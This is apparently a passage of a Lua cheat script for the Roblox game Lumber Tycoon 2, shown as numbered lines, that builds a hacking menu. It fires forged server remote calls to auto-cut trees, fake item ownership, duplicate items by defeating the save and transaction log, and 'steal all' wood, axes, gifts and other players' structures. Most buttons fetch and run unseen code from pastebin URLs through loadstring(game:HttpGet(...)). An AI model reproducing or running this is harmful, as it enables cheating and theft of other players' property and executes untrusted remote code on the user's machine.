  2140. for j, k in ipairs(v:GetChildren()) do
  2141. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "GreenSwampy" then
  2142. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2143. break
  2144. end
  2145. end
  2146. end
  2147. end
  2148. Type.Text = "Zombie Tree"
  2149. end)
  2150.  
  2151. Treeaura.Name = "Tree aura"
  2152. Treeaura.Parent = WoodFrame
  2153. Treeaura.BackgroundColor3 = Color3.new(0, 0, 0)
  2154. Treeaura.BorderColor3 = Color3.new(0, 0, 0)
  2155. Treeaura.Position = UDim2.new(0, 3, 0, 187)
  2156. Treeaura.Size = UDim2.new(0, 165, 0, 20)
  2157. Treeaura.Font = Enum.Font.Fantasy
  2158. Treeaura.FontSize = Enum.FontSize.Size18
  2159. Treeaura.Text = "Tree Aura"
  2160. Treeaura.TextColor3 = Color3.new(255, 0, 0)
  2161. Treeaura.TextSize = 15
  2162. Treeaura.MouseButton1Down:connect(function()
  2163. makesound("rbxassetid://156785206")
  2164. if CutEnabled == true then
  2165. CutEnabled = false
  2166. Treeaura.Text = "Tree Aura off"
  2167. Treeaura.TextColor3 = Color3.new(255, 0, 0)
  2168. elseif CutEnabled == false then
  2169. CutEnabled = true
  2170. Treeaura.Text = "Tree Aura on"
  2171. Treeaura.TextColor3 = Color3.new(0, 1, 0)
  2172. end
  2173. end)
  2174. --Credits to Johiro
  2175.  
  2176. local function GetAxe() --Gets your current axe thats equiped when called
  2177. if game.Players.LocalPlayer.Character:FindFirstChild("Tool") then
  2178. return game.Players.LocalPlayer.Character.Tool --returns the axe when found
  2179. else
  2180. return false --returns false when not equiped
  2181. end
  2182. end
  2183.  
  2184. local function GetDamage(Axe, TreeClass)-- Gets the right Damage of the axe and returns it if called to prevent killing yourself like gold axe
  2185. if Axe.ToolTip == "Basic Hatchet" then return 0.2
  2186. elseif Axe.ToolTip == "Plain Axe" then return 0.55
  2187. elseif Axe.ToolTip == "Steel Axe" then return 0.93
  2188. elseif Axe.ToolTip == "Hardened Axe" then return 1.45
  2189. elseif Axe.ToolTip == "Silver Axe" then return 1.6
  2190. elseif Axe.ToolTip == "Rukiryaxe" then return 1.68
  2191. elseif Axe.ToolTip == "Beta Axe of Bosses" then return 1.45
  2192. elseif Axe.ToolTip == "Alpha Axe of Testing" then return 1.5
  2193. elseif Axe.ToolTip == "Fire Axe" then
  2194. if TreeClass ~= "Volcano" then return 0.6 else return 6.35 end
  2195. elseif Axe.ToolTip == "End Times Axe" then
  2196. if TreeClass ~= "LoneCave" then return 1.58 else return 10000000 end
  2197. elseif Axe.ToolTip == "Candy Cane Axe" then return 0
  2198. elseif Axe.ToolTip == "Johiro" then return 1.8
  2199. elseif Axe.ToolTip == "Beesaxe" then return 1.4
  2200. elseif Axe.ToolTip == "CHICKEN AXE" then return 0.9
  2201. elseif Axe.ToolTip == "Amber Axe" then return 3.39
  2202. elseif Axe.ToolTip == "The Many Axe" then return 10.2
  2203. elseif Axe.ToolTip == "Gingerbread Axe" then
  2204. if TreeClass == "Walnut" then return 8.5
  2205. elseif TreeClass == "Koa" then return 11 else return 1.2 end
  2206. elseif Axe.ToolTip == "Bird Axe" then
  2207. if TreeClass == "Volcano" then return 2.5 elseif TreeClass == "CaveCrawler" then return 3.9 else return 1.65 end
  2208. end
  2209. end
  2210.  
  2211. TreeList = {} --Creates a table of the trees
  2212. for a,b in pairs(workspace:GetChildren()) do
  2213. if b.name == "TreeRegion" then
  2214. b.ChildAdded:Connect(function(NewTree)--Creates functions that Adds new trees to the list
  2215. table.insert(TreeList, NewTree)
  2216. end)
  2217. for c,d in pairs(b:GetChildren()) do-- Adds the trees when first time starting the script
  2218. if d.Name == "Model" then
  2219. table.insert(TreeList, d)
  2220. end
  2221. end
  2222. end
  2223. end
  2224.  
  2225. local function CutTree(Tree) --Cuts the tree when called with the tree you want to cut
  2226. if GetAxe() ~= false then --checks if you have a axe equiped
  2227. Damage = GetDamage(GetAxe(), Tree.TreeClass.Value) --gets the Damage
  2228. local CutArguments = {
  2229. sectionId = 1,
  2230. faceVector = Vector3.new(0,0,-1),
  2231. height = 0.5,
  2232. hitPoints = Damage,
  2233. cooldown = 0,
  2234. cuttingClass = "Axe",
  2235. tool = GetAxe()
  2236. }
  2237. for i=1, 50 do
  2238. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(Tree.CutEvent, CutArguments)
  2239. end
  2240. end
  2241. end
  2242.  
  2243. spawn(function() --used spawn so it wont interrupt any of the other things
  2244. CutEnabled = false
  2245. while wait(.5) do --Main loop to do the stuff
  2246. if CutEnabled == true then
  2247. if GetAxe() ~= false then --Checks if you have a axe equiped
  2248. for a,b in pairs(TreeList) do
  2249. if not b:FindFirstChild("RootCut") and b:FindFirstChild("CutEvent") then --Checks if the tree is already cut
  2250. distance = (game.Players.LocalPlayer.Character.Head.Position - b.WoodSection.Position).magnitude --gets the distance between player and tree
  2251. if distance < 225 then --if distance lower than 225 then it will cut the tree
  2252. CutTree(b) --Calls the function with the tree to cut
  2253. end
  2254. else
  2255. table.remove(TreeList, a)--if tree already cut then it gets removed from the list
  2256. end
  2257. end
  2258. end
  2259. end
  2260. end
  2261. end)
  2262.  
  2263. BigPlank.Name = "BigPlank"
  2264. BigPlank.Parent = WoodFrame
  2265. BigPlank.BackgroundColor3 = Color3.new(0, 0, 0)
  2266. BigPlank.BorderColor3 = Color3.new(0, 0, 0)
  2267. BigPlank.Position = UDim2.new(0, 3, 0, 210)
  2268. BigPlank.Size = UDim2.new(0, 165, 0, 20)
  2269. BigPlank.Font = Enum.Font.Fantasy
  2270. BigPlank.FontSize = Enum.FontSize.Size18
  2271. BigPlank.Text = "Mod Wood"
  2272. BigPlank.TextColor3 = Color3.new(255, 0, 0)
  2273. BigPlank.TextSize = 15
  2274. BigPlank.MouseButton1Down:connect(function()
  2275. makesound("rbxassetid://156785206")
  2276. for _, Log in pairs(workspace.LogModels:GetChildren()) do
  2277. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  2278. if Log.Owner.Value == game.Players.LocalPlayer then
  2279. for i,v in pairs(Log:GetChildren()) do
  2280. if v.Name=="WoodSection" then
  2281. spawn(function()
  2282. for i=1,10 do
  2283. wait()
  2284. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  2285. end
  2286. end)
  2287. end
  2288. end
  2289. spawn(function()
  2290. for i=1,20 do
  2291. wait()
  2292. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  2293. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  2294. end
  2295. end)
  2296. end
  2297. end
  2298. end
  2299. wait(2.0)
  2300. for _, Log in pairs(game.Workspace.LogModels:GetChildren()) do
  2301. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  2302. if Log.Owner.Value == game.Players.LocalPlayer then
  2303. Log:MoveTo(game.Players.LocalPlayer.Character.HumanoidRootPart.Position)
  2304. for i=1,20 do
  2305. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  2306. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  2307. end
  2308. end
  2309. end
  2310. end
  2311.  
  2312. SawmillC = false
  2313. Mouse = game.Players.LocalPlayer:GetMouse()
  2314.  
  2315. Mouse.KeyDown:connect(function(key)
  2316. if key:lower() == "p" then
  2317. Treee = Mouse.Target
  2318. end
  2319. end)
  2320. Mouse.KeyDown:connect(function(key)
  2321. if key:lower() == "m" then
  2322. if Mouse.Target.Parent:FindFirstChild("BlockageAlert") then
  2323. Sawmill = Mouse.Target.Parent
  2324. else
  2325. Sawmill=Mouse.Target.Parent.Parent
  2326. end
  2327. if Sawmill:FindFirstChild("BlockageAlert") and Sawmill:FindFirstChild("Owner") then
  2328. SawmillC = true
  2329. else
  2330. SawmillC = false
  2331. print"Something went wrong while setting the sawmill!"
  2332. end
  2333. if Treee ~= nil then
  2334. Mod(Treee)
  2335. else
  2336. print("Select tree with 'p!")
  2337. end
  2338. end
  2339. end)
  2340.  
  2341. function Mod(SelectedPart)
  2342. if SawmillC ~= true then
  2343. print'Set the sawmill with "m"!'
  2344. return
  2345. end
  2346. if SelectedPart.Parent:FindFirstChild("TreeClass") and SelectedPart.Parent:FindFirstChild("Owner") then
  2347. print("Tree: "..SelectedPart.Parent.TreeClass.Value)
  2348. Tree = SelectedPart.Parent
  2349. Tree.PrimaryPart = SelectedPart
  2350. game.ReplicatedStorage.Interaction.Verify:FireServer('Item owned by player',Tree)
  2351. Tree:SetPrimaryPartCFrame(Sawmill.Particles.CFrame)
  2352. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Tree)
  2353. end
  2354. end
  2355. end)
  2356.  
  2357. RemoveT.Name = "RemoveT"
  2358. RemoveT.Parent = WoodFrame
  2359. RemoveT.BackgroundColor3 = Color3.new(0, 0, 0)
  2360. RemoveT.BorderColor3 = Color3.new(0, 0, 0)
  2361. RemoveT.Position = UDim2.new(0, 3, 0, 233)
  2362. RemoveT.Size = UDim2.new(0, 165, 0, 20)
  2363. RemoveT.Font = Enum.Font.Fantasy
  2364. RemoveT.FontSize = Enum.FontSize.Size18
  2365. RemoveT.Text = "Remove Trees"
  2366. RemoveT.TextColor3 = Color3.new(255, 0, 0)
  2367. RemoveT.TextSize = 15
  2368. RemoveT.MouseButton1Down:connect(function()
  2369. makesound("rbxassetid://156785206")
  2370. RemoveT.BackgroundColor3 = Color3.new(0, 0, 0)
  2371. RemoveT.TextColor3 = Color3.new(0, 1, 0)
  2372. for i,v in pairs(game.Workspace:GetDescendants()) do
  2373. if v.Name == "WoodSection" and v.Parent:FindFirstChild("CutEvent") then
  2374. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(v.Parent)
  2375. game.ReplicatedStorage.Interaction.DestroyStructure:FireServer(v.Parent)
  2376. end
  2377. end
  2378. game.Workspace.DescendantAdded:connect(function(Thing)
  2379. wait(0.1)
  2380. if Thing.Name == "WoodSection" and Thing.Parent:FindFirstChild("CutEvent") then
  2381. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Thing.Parent)
  2382. game.ReplicatedStorage.Interaction.DestroyStructure:FireServer(Thing.Parent)
  2383. end
  2384. end)
  2385. end)
  2386.  
  2387. Copymenu.Name = "Copymenu"
  2388. Copymenu.Parent = Picker
  2389. Copymenu.BackgroundColor3 = Color3.new(1, 1, 1)
  2390. Copymenu.BorderColor3 = Color3.new(0, 0, 0)
  2391. Copymenu.Position = UDim2.new(0, 15, 0,260)
  2392. Copymenu.Size = UDim2.new(0, 80, 0, 80)
  2393. Copymenu.ZIndex = 3
  2394. Copymenu.Image = "rbxassetid://3899462163"
  2395. Copymenu.ScaleType = Enum.ScaleType.Crop
  2396. Copymenu.MouseButton1Click:Connect(function()
  2397. CurrentItem.Image = "rbxassetid://3886256996"
  2398. makesound("rbxassetid://156785206")
  2399. AIntroImage.Visible = false
  2400. AIntroImage1.Visible = false
  2401. end)
  2402.  
  2403. CopyFrame.Name = "CopyFrame"
  2404. CopyFrame.Parent = MenuFrame
  2405. CopyFrame.BorderSizePixel = 1
  2406. CopyFrame.BackgroundTransparency = 0
  2407. CopyFrame.BorderColor3 = Color3.new(0, 0, 0)
  2408. CopyFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  2409. CopyFrame.Size = UDim2.new(0, 170, 0, 439)
  2410. CopyFrame.Visible = false
  2411.  
  2412. PlayerNameBox.Name = "PlayerNameBox"
  2413. PlayerNameBox.Parent = CopyFrame
  2414. PlayerNameBox.BackgroundColor3 = Color3.new(0, 0, 0)
  2415. PlayerNameBox.BorderColor3 = Color3.new(0, 0, 0)
  2416. PlayerNameBox.Position = UDim2.new(0, 3, 0, 3)
  2417. PlayerNameBox.Size = UDim2.new(0, 165, 0, 20)
  2418. PlayerNameBox.Font = Enum.Font.Fantasy
  2419. PlayerNameBox.FontSize = Enum.FontSize.Size18
  2420. PlayerNameBox.Text = "PLAYER NAME"
  2421. PlayerNameBox.TextColor3 = Color3.new(255, 0, 0)
  2422. PlayerNameBox.TextSize = 15
  2423.  
  2424. AXETRUCK.Name = "AXETRUCK"
  2425. AXETRUCK.Parent = CopyFrame
  2426. AXETRUCK.BackgroundColor3 = Color3.new(0, 0, 0)
  2427. AXETRUCK.BorderSizePixel = 1
  2428. AXETRUCK.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2429. AXETRUCK.Position = UDim2.new(0,175, 0, 3)
  2430. AXETRUCK.Size = UDim2.new(0, 165, 0, 20)
  2431. AXETRUCK.Font = Enum.Font.Fantasy
  2432. AXETRUCK.FontSize = Enum.FontSize.Size18
  2433. AXETRUCK.Text = "Axe + Truck S/Port"
  2434. AXETRUCK.TextColor3 = Color3.new(255, 0, 0)
  2435. AXETRUCK.TextSize = 15
  2436. AXETRUCK.MouseButton1Down:connect(function()
  2437. makesound("rbxassetid://156785206")
  2438. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2439. wait(2.5)
  2440. MainFrame.Visible = false
  2441. OpenFrame.Visible = true
  2442. loadstring(game:HttpGet('https://pastebin.com/raw/TYUpEE2R',true))()
  2443. end)
  2444.  
  2445. WireObjects.Name = "WireObjects"
  2446. WireObjects.Parent = CopyFrame
  2447. WireObjects.BackgroundColor3 = Color3.new(0, 0, 0)
  2448. WireObjects.BorderSizePixel = 1
  2449. WireObjects.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2450. WireObjects.Position = UDim2.new(0,175, 0, 26)
  2451. WireObjects.Size = UDim2.new(0, 165, 0, 20)
  2452. WireObjects.Font = Enum.Font.Fantasy
  2453. WireObjects.FontSize = Enum.FontSize.Size18
  2454. WireObjects.Text = "Wire Objects S/Port"
  2455. WireObjects.TextColor3 = Color3.new(255, 0, 0)
  2456. WireObjects.TextSize = 15
  2457. WireObjects.MouseButton1Down:connect(function()
  2458. makesound("rbxassetid://156785206")
  2459. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2460. wait(2.5)
  2461. MainFrame.Visible = false
  2462. OpenFrame.Visible = true
  2463. loadstring(game:HttpGet('https://pastebin.com/raw/hf5D029M',true))()
  2464. end)
  2465.  
  2466. giftsport.Name = "giftsport"
  2467. giftsport.Parent = CopyFrame
  2468. giftsport.BackgroundColor3 = Color3.new(0, 0, 0)
  2469. giftsport.BorderSizePixel = 1
  2470. giftsport.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2471. giftsport.Position = UDim2.new(0,175, 0, 49)
  2472. giftsport.Size = UDim2.new(0, 165, 0, 20)
  2473. giftsport.Font = Enum.Font.Fantasy
  2474. giftsport.FontSize = Enum.FontSize.Size18
  2475. giftsport.Text = "Gifts S/Port"
  2476. giftsport.TextColor3 = Color3.new(255, 0, 0)
  2477. giftsport.TextSize = 15
  2478. giftsport.MouseButton1Down:connect(function()
  2479. makesound("rbxassetid://156785206")
  2480. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2481. wait(2.5)
  2482. MainFrame.Visible = false
  2483. OpenFrame.Visible = true
  2484. loadstring(game:HttpGet('https://pastebin.com/raw/br15QAkw',true))()
  2485. end)
  2486.  
  2487. HardStructures.Name = "HardStructures"
  2488. HardStructures.Parent = CopyFrame
  2489. HardStructures.BackgroundColor3 = Color3.new(0, 0, 0)
  2490. HardStructures.BorderSizePixel = 1
  2491. HardStructures.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2492. HardStructures.Position = UDim2.new(0,175, 0, 72)
  2493. HardStructures.Size = UDim2.new(0, 165, 0, 20)
  2494. HardStructures.Font = Enum.Font.Fantasy
  2495. HardStructures.FontSize = Enum.FontSize.Size18
  2496. HardStructures.Text = "Glass + Conveyors S/Port"
  2497. HardStructures.TextColor3 = Color3.new(255, 0, 0)
  2498. HardStructures.TextSize = 15
  2499. HardStructures.MouseButton1Down:connect(function()
  2500. makesound("rbxassetid://156785206")
  2501. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2502. wait(2.5)
  2503. MainFrame.Visible = false
  2504. OpenFrame.Visible = true
  2505. loadstring(game:HttpGet('https://pastebin.com/raw/sxGrqwEZ',true))()
  2506. end)
  2507.  
  2508. other.Name = "other"
  2509. other.Parent = CopyFrame
  2510. other.BackgroundColor3 = Color3.new(0, 0, 0)
  2511. other.BorderSizePixel = 1
  2512. other.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2513. other.Position = UDim2.new(0,175, 0, 95)
  2514. other.Size = UDim2.new(0, 165, 0, 20)
  2515. other.Font = Enum.Font.Fantasy
  2516. other.FontSize = Enum.FontSize.Size18
  2517. other.Text = "Other S/Port"
  2518. other.TextColor3 = Color3.new(255, 0, 0)
  2519. other.TextSize = 15
  2520. other.MouseButton1Down:connect(function()
  2521. makesound("rbxassetid://156785206")
  2522. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2523. wait(2.5)
  2524. MainFrame.Visible = false
  2525. OpenFrame.Visible = true
  2526. loadstring(game:HttpGet('https://pastebin.com/raw/e3MCdFDF',true))()
  2527. end)
  2528.  
  2529.  
  2530. Paintingf.Name = "Paintingf"
  2531. Paintingf.Parent = CopyFrame
  2532. Paintingf.BackgroundColor3 = Color3.new(0, 0, 0)
  2533. Paintingf.BorderSizePixel = 1
  2534. Paintingf.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2535. Paintingf.Position = UDim2.new(0, 175, 0, 118)
  2536. Paintingf.Size = UDim2.new(0, 165, 0, 20)
  2537. Paintingf.Font = Enum.Font.Fantasy
  2538. Paintingf.FontSize = Enum.FontSize.Size18
  2539. Paintingf.Text = "Painting + Furn S/Port"
  2540. Paintingf.TextColor3 = Color3.new(255, 0, 0)
  2541. Paintingf.TextSize = 15
  2542. Paintingf.MouseButton1Down:connect(function()
  2543. makesound("rbxassetid://156785206")
  2544. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2545. wait(2.5)
  2546. MainFrame.Visible = false
  2547. OpenFrame.Visible = true
  2548. loadstring(game:HttpGet('https://pastebin.com/raw/qw5Vqh62',true))()
  2549. end)
  2550.  
  2551. TPtreesPlanks.Name = "Tree aura"
  2552. TPtreesPlanks.Parent = CopyFrame
  2553. TPtreesPlanks.BackgroundColor3 = Color3.new(0, 0, 0)
  2554. TPtreesPlanks.BorderSizePixel = 1
  2555. TPtreesPlanks.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2556. TPtreesPlanks.Position = UDim2.new(0, 175, 0, 141)
  2557. TPtreesPlanks.Size = UDim2.new(0, 165, 0, 20)
  2558. TPtreesPlanks.Font = Enum.Font.Fantasy
  2559. TPtreesPlanks.FontSize = Enum.FontSize.Size18
  2560. TPtreesPlanks.Text = "Plank S/Port"
  2561. TPtreesPlanks.TextColor3 = Color3.new(255, 0, 0)
  2562. TPtreesPlanks.TextSize = 15
  2563. TPtreesPlanks.MouseButton1Down:connect(function()
  2564. makesound("rbxassetid://156785206")
  2565. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2566. wait(2.5)
  2567. MainFrame.Visible = false
  2568. OpenFrame.Visible = true
  2569. loadstring(game:HttpGet('https://pastebin.com/raw/uQEpKgLN',true))()
  2570. end)
  2571.  
  2572. CopyBase.Name = "CopyBase"
  2573. CopyBase.Parent = CopyFrame
  2574. CopyBase.BackgroundColor3 = Color3.new(0, 0, 0)
  2575. CopyBase.BorderColor3 = Color3.new(0, 0, 0)
  2576. CopyBase.Position = UDim2.new(0, 3, 0, 26)
  2577. CopyBase.Size = UDim2.new(0, 165, 0, 20)
  2578. CopyBase.Font = Enum.Font.Fantasy
  2579. CopyBase.FontSize = Enum.FontSize.Size18
  2580. CopyBase.Text = "Copy Base"
  2581. CopyBase.TextColor3 = Color3.new(255, 0, 0)
  2582. CopyBase.TextSize = 15
  2583. CopyBase.MouseButton1Down:connect(function()
  2584. makesound("rbxassetid://156785206")
  2585. loadstring(game:HttpGet('https://pastebin.com/raw/p9mWDwFv',true))()
  2586. end)
  2587.  
  2588.  
  2589. ItemDupe.Name = "ItemDupe"
  2590. ItemDupe.Parent = CopyFrame
  2591. ItemDupe.BackgroundColor3 = Color3.new(0, 0, 0)
  2592. ItemDupe.BorderColor3 = Color3.new(0, 0, 0)
  2593. ItemDupe.Position = UDim2.new(0, 3, 0, 49)
  2594. ItemDupe.Size = UDim2.new(0, 165, 0, 20)
  2595. ItemDupe.Font = Enum.Font.Fantasy
  2596. ItemDupe.FontSize = Enum.FontSize.Size18
  2597. ItemDupe.Text = "Dupe Mode"
  2598. ItemDupe.TextColor3 = Color3.new(255, 0, 0)
  2599. ItemDupe.TextSize = 15
  2600. ItemDupe.MouseButton1Down:connect(function()
  2601. makesound("rbxassetid://156785206")
  2602. --Functions, look here for the source and how it works if you want to know, also give me credits if you skid xD
  2603.  
  2604. --Prevent the game to kick you by letting the script error by not fincing the remote
  2605. if game.ReplicatedStorage.Transactions:FindFirstChild("AddLog") then
  2606. game.ReplicatedStorage.Transactions.AddLog:Destroy()
  2607. end
  2608.  
  2609. --Button function (toggle)
  2610. local Enabled = false
  2611. ItemDupe.MouseButton1Down:Connect(function()
  2612. if Enabled == true then
  2613. Enabled = false
  2614. ItemDupe.Text = "Dupe Mode: Disabled"
  2615. elseif Enabled == false then
  2616. Enabled = true
  2617. ItemDupe.Text = "Dupe Mode: Enabled"
  2618. end
  2619. end)
  2620.  
  2621.  
  2622. --Changes slot to -1 when Enabled to prevent saving
  2623. while wait(.25) do
  2624. if Enabled == true then
  2625. game.Players.LocalPlayer.CurrentSaveSlot.Value = -1
  2626. end
  2627. end
  2628.  
  2629. --Credits to Johiro
  2630. end)
  2631.  
  2632. GetWood.Name = "GetWood"
  2633. GetWood.Parent = CopyFrame
  2634. GetWood.BackgroundColor3 = Color3.new(0, 0, 0)
  2635. GetWood.BorderColor3 = Color3.new(0, 0, 0)
  2636. GetWood.Position = UDim2.new(0, 3, 0, 72)
  2637. GetWood.Size = UDim2.new(0, 165, 0, 20)
  2638. GetWood.Font = Enum.Font.Fantasy
  2639. GetWood.FontSize = Enum.FontSize.Size18
  2640. GetWood.Text = "Steal all Wood"
  2641. GetWood.TextColor3 = Color3.new(255, 0, 0)
  2642. GetWood.TextSize = 15
  2643. GetWood.MouseButton1Down:connect(function()
  2644. makesound("rbxassetid://156785206")
  2645. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2646. wait(2.5)
  2647. MainFrame.Visible = false
  2648. OpenFrame.Visible = true
  2649. loadstring(game:HttpGet('https://pastebin.com/raw/uKAXDx1d',true))()
  2650. end)
  2651.  
  2652. GetItems.Name = "GetItems"
  2653. GetItems.Parent = CopyFrame
  2654. GetItems.BackgroundColor3 = Color3.new(0, 0, 0)
  2655. GetItems.BorderColor3 = Color3.new(0, 0, 0)
  2656. GetItems.Position = UDim2.new(0, 3, 0, 95)
  2657. GetItems.Size = UDim2.new(0, 165, 0, 20)
  2658. GetItems.Font = Enum.Font.Fantasy
  2659. GetItems.FontSize = Enum.FontSize.Size18
  2660. GetItems.Text = "Steal all Items"
  2661. GetItems.TextColor3 = Color3.new(255, 0, 0)
  2662. GetItems.TextSize = 15
  2663. GetItems.MouseButton1Down:connect(function()
  2664. makesound("rbxassetid://156785206")
  2665. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2666. wait(2.5)
  2667. MainFrame.Visible = false
  2668. OpenFrame.Visible = true
  2669. loadstring(game:HttpGet('https://pastebin.com/raw/qbZbq6Bi',true))()
  2670. end)
  2671.  
  2672. GetAxes.Name = "GetAxes"
  2673. GetAxes.Parent = CopyFrame
  2674. GetAxes.BackgroundColor3 = Color3.new(0, 0, 0)
  2675. GetAxes.BorderColor3 = Color3.new(0, 0, 0)
  2676. GetAxes.Position = UDim2.new(0, 3, 0, 118)
  2677. GetAxes.Size = UDim2.new(0, 165, 0, 20)
  2678. GetAxes.Font = Enum.Font.Fantasy
  2679. GetAxes.FontSize = Enum.FontSize.Size18
  2680. GetAxes.Text = "Steal all Axes"
  2681. GetAxes.TextColor3 = Color3.new(255, 0, 0)
  2682. GetAxes.TextSize = 15
  2683. GetAxes.MouseButton1Down:connect(function()
  2684. makesound("rbxassetid://156785206")
  2685. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2686. wait(2.5)
  2687. MainFrame.Visible = false
  2688. OpenFrame.Visible = true
  2689. loadstring(game:HttpGet('https://pastebin.com/raw/y61fFyKY',true))()
  2690. end)
  2691.  
  2692.  
  2693. GetGifts.Name = "GetGifts"
  2694. GetGifts.Parent = CopyFrame
  2695. GetGifts.BackgroundColor3 = Color3.new(0, 0, 0)
  2696. GetGifts.BorderColor3 = Color3.new(0, 0, 0)
  2697. GetGifts.Position = UDim2.new(0, 3, 0, 141)
  2698. GetGifts.Size = UDim2.new(0, 165, 0, 20)
  2699. GetGifts.Font = Enum.Font.Fantasy
  2700. GetGifts.FontSize = Enum.FontSize.Size18
  2701. GetGifts.Text = "Steal all Gifts"
  2702. GetGifts.TextColor3 = Color3.new(255, 0, 0)
  2703. GetGifts.TextSize = 15
  2704. GetGifts.MouseButton1Down:connect(function()
  2705. makesound("rbxassetid://156785206")
  2706. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2707. wait(2.5)
  2708. MainFrame.Visible = false
  2709. OpenFrame.Visible = true
  2710. loadstring(game:HttpGet('https://pastebin.com/raw/QSADN8bJ',true))()
  2711. end)
  2712.  
  2713.  
  2714.  
  2715. GetStructure.Name = "GetStructure"
  2716. GetStructure.Parent = CopyFrame
  2717. GetStructure.BackgroundColor3 = Color3.new(0, 0, 0)
  2718. GetStructure.BorderColor3 = Color3.new(0, 0, 0)
  2719. GetStructure.Position = UDim2.new(0, 3, 0, 164)
  2720. GetStructure.Size = UDim2.new(0, 165, 0, 20)
  2721. GetStructure.Font = Enum.Font.Fantasy
  2722. GetStructure.FontSize = Enum.FontSize.Size18
  2723. GetStructure.Text = "Steal all Structures"
  2724. GetStructure.TextColor3 = Color3.new(255, 0, 0)
  2725. GetStructure.TextSize = 15
  2726. GetStructure.MouseButton1Down:connect(function()
  2727. makesound("rbxassetid://156785206")
  2728. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2729. wait(2.5)
  2730. MainFrame.Visible = false
  2731. OpenFrame.Visible = true
  2732. loadstring(game:HttpGet('https://pastebin.com/raw/TtxVVGAn',true))()
  2733. end)
  2734.  
  2735. GetFurniture.Name = "GetFurniture"
  2736. GetFurniture.Parent = CopyFrame
  2737. GetFurniture.BackgroundColor3 = Color3.new(0, 0, 0)
  2738. GetFurniture.BorderColor3 = Color3.new(0, 0, 0)
  2739. GetFurniture.Position = UDim2.new(0, 3, 0, 187)
  2740. GetFurniture.Size = UDim2.new(0, 165, 0, 20)
  2741. GetFurniture.Font = Enum.Font.Fantasy
  2742. GetFurniture.FontSize = Enum.FontSize.Size18
  2743. GetFurniture.Text = "Steal all Furniture"
  2744. GetFurniture.TextColor3 = Color3.new(255, 0, 0)
  2745. GetFurniture.TextSize = 15
  2746. GetFurniture.MouseButton1Down:connect(function()
  2747. makesound("rbxassetid://156785206")
  2748. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2749. wait(2.5)
  2750. MainFrame.Visible = false
  2751. OpenFrame.Visible = true
  2752. loadstring(game:HttpGet('https://pastebin.com/raw/iQujeNTN',true))()
  2753. end)
  2754.  
  2755.  
  2756. GetVehicle.Name = "GetVehicle"
  2757. GetVehicle.Parent = CopyFrame
  2758. GetVehicle.BackgroundColor3 = Color3.new(0, 0, 0)
  2759. GetVehicle.BorderColor3 = Color3.new(0, 0, 0)
  2760. GetVehicle.Position = UDim2.new(0, 3, 0, 210)
  2761. GetVehicle.Size = UDim2.new(0, 165, 0, 20)
  2762. GetVehicle.Font = Enum.Font.Fantasy
  2763. GetVehicle.FontSize = Enum.FontSize.Size18
  2764. GetVehicle.Text = "Steal all Box Vehicles"
  2765. GetVehicle.TextColor3 = Color3.new(255, 0, 0)
  2766. GetVehicle.TextSize = 15
  2767. GetVehicle.MouseButton1Down:connect(function()
  2768. makesound("rbxassetid://156785206")
  2769. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2770. wait(2.5)
  2771. MainFrame.Visible = false
  2772. OpenFrame.Visible = true
  2773. loadstring(game:HttpGet('https://pastebin.com/raw/D0z4jG6d',true))()
  2774. end)
  2775.  
  2776.  
  2777. GetWires.Name = "GetWires"
  2778. GetWires.Parent = CopyFrame
  2779. GetWires.BackgroundColor3 = Color3.new(0, 0, 0)
  2780. GetWires.BorderColor3 = Color3.new(0, 0, 0)
  2781. GetWires.Position = UDim2.new(0, 3, 0, 233)
  2782. GetWires.Size = UDim2.new(0, 165, 0, 20)
  2783. GetWires.Font = Enum.Font.Fantasy
  2784. GetWires.FontSize = Enum.FontSize.Size18
  2785. GetWires.Text = "Steal all Wires"
  2786. GetWires.TextColor3 = Color3.new(255, 0, 0)
  2787. GetWires.TextSize = 15
  2788. GetWires.MouseButton1Down:connect(function()
  2789. makesound("rbxassetid://156785206")
  2790. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2791. wait(2.5)
  2792. MainFrame.Visible = false
